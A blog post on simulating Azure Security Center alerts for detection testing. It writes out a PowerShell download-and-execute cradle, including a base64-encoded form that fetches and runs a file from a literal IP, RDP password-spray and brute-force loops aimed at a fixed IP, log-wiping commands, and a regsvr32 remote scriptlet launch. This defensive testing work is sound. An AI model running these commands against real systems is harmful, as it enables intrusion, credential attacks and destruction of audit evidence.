Simulate alerts to be caught by ASC

I got a question from my friend about how to safely create alerts in order to test Azure Security Center. He wanted to test several automation capabilities such as Azure Sentinel, ASC playbook with Logic App or any form of security orchestration & automation.

In this article, I’d like to share a few ways to safely create High & Medium severity alerts that are raised by Azure Security Center in case your organization doesn’t have Red Team/ or they are not currently involved.

Before running any simulation your team should be informed. The simulation should also be run in non-production subscription too.

Follow Microsoft Alert Validation Guidance

This article gives you a simple guidance on how to create a testing alert by simply poping up calculator application.

Suspicious PowerShell Activity Detected

One of the very common malware attack technique today is file-less. If you run a PowerShell script that looks suspicious ASC would raise a High severity alert. Take a look at the following command

PowerShell -ExecutionPolicy bypass -noprofile -command (New-Object System.Net.WebClient).DownloadFile("http://something/someone", "$env:APPDATA\hl.ps1" );Start-Process( "$env:APPDATA\hl.ps1" )

You may get nothing if you execute this one because the URL in the command line cannot be resolved. And there shouldn’t be any alert raised. However, if you encode it into base64

UG93ZXJTaGVsbCAtRXhlY3V0aW9uUG9saWN5IGJ5cGFzcyAtbm9wcm9maWxlIC1jb21tYW5kIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly80MC43OC42OC41Ny9ub2ZpbGUiLCAiJGVudjpUTVBcaGwuZXhlIiApOyBTdGFydC1Qcm9jZXNzKCIkZW52OlRNUFxobC5leGUiKQ==

and execute it with -EncodedCommand

powershell.exe -enc UG93ZXJTaGVsbCAtRXhlY3V0aW9uUG9saWN5IGJ5cGFzcyAtbm9wcm9maWxlIC1jb21tYW5kIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly80MC43OC42OC41Ny9ub2ZpbGUiLCAiJGVudjpUTVBcaGwuZXhlIiApOyBTdGFydC1Qcm9jZXNzKCIkZW52OlRNUFxobC5leGUiKQ==

You will get caught by Azure Security Center.

Expose your virtual machine to Internet

The second way is to make your virtual machine be visible to the Internet without being protected. There are a few conditions to be made:

  • The virtual machine has a Public IP address associated.
  • The virtual machine doesn’t block any incoming SSH (22) and RDP (3389).
  • The virtual machine is not placed behind any load balancer or security perimeter.

Before examining this way, again your team should be informed. The virtual machine should also be deployed in an isolated virtual network that is not peering with any other virtual networks in your environment. You do need to ensure you watch the virtual machine continuously because once the virtual machine is compromised it can be abused as an attack service to target to the main victim.

Once the virtual machine is scanned and get recognized by a bad actor it would get password spray and brute-force attacks. Below are common alert types that are associated when such a virtual machine is attacked:

  • Suspicious authentication activity
  • Failed SSH brute force attack
  • Successful RDP Brute Force Attack
  • Successful SSH Brute Force Attack
  • Suspicious incoming RDP network activity
  • Traffic detected from IP addresses recommended for blocking (formerly Traffic from unrecommended IP addresses was detected)

For spamming RDP client the you might try with the following code snippet for password spray:

$users = Get-Content -Path "C:\azsec\user.txt"
$targetIp = "40.71.18.17"
$password = "yourPassW0rd1"
foreach($user in $users){
    cmdkey /generic:TERMSRV/$targetIp /user:$user /pass:$password
    Write-Host -ForegroundColor Yellow "Connecting" $targetIp "with username: $user" "and password:" $password
    mstsc /v:$targetIp /noConsentPrompt 
}

For brute-force spamming RDP, use the following one:

$pws = Get-Content -Path "C:\Users\Dell\Desktop\blog\pw.txt"
$targetIp = "40.71.18.17"
$user = "admin"
foreach($pw in $pws){
    cmdkey /generic:TERMSRV/$targetIp /user:$user /pass:$pw
    Write-Host -ForegroundColor Yellow "Connecting" $targetIp "with username:" $user "and password:" $pw
    mstsc /v:$targetIp /noConsentPrompt
}

These scripts would spam RDP only and may not give you a perfect solution to catch successful logon (once failed logon occurs the RDP client awaits for an input of another password interactively.  For effective solution, I’d recommend you to enable PsRemoting 

For Linux virtual machine, you can write Python script on top of paramiko module or parallel ssh with bash shell

Create EICAR test file

Eicar is a very famous anti-virus test file. You can simply copy the following 68-bytes string below to a *.txt and change to *.com extension.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Once the file is created, Windows Defender will detect and warn you. The interesting part is that Windows Defender will send the detection signal to ASC before the alert is in the portal. To do that, ASC agent is pre-integrated with Windows Defender ATP (not Windows Defender) capabilities.

If you make any action on this test file, Windows Defender will also send the info to ASC with an alert named “Antimalware Action Taken“. The alert detail will tell you the action you did (e.g. Blocked, Allowed..).

Clear Security and Audit Log

On Windows virtual machine, once you clear security event log by a simple command below you will get caught by ASC:

Clear-EventLog -LogName Security

With Linux, try to remove lastlog  or directory

rm /var/log/lastlog
rm -rf /var/log/audit

Create a Powemet like file-less attack

Powemet is an malware that leverages regsvr32 to execute malicious script. To test it, prepare *.sct file extension with the following content:

<?XML version="1.0"?>
<scriptlet>
    <registration 
	    <script language="JScript">
		    <![CDATA[
			    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
		]]>
        </script>
    </registration>
</scriptlet>

Upload the file to a storage account’s container which is set Public so you can execute it anonymously. Open Windows command prompt and run the following command:

regsvr32.exe /s /u /i:https://tsstoragepublic003.blob.core.windows.net/public/azsec.sct scrobj.dll

Hope some of the tips above help create ASC alert for evaluation and testing automation capability (e.g. with other managed services like Azure Logic App, Azure Functions  as well as with third party likes SeviceNow, Slack, Microsoft Teams..).

Here is what you can produce for testing

[Updated] This article has a few ways to trigger ASC for Storage https://azsec.azurewebsites.net/2019/12/20/security-monitoring-and-detection-tips-for-your-storage-account-part-3/

This entry was posted in Azure Security Center and tagged , . Bookmark the permalink.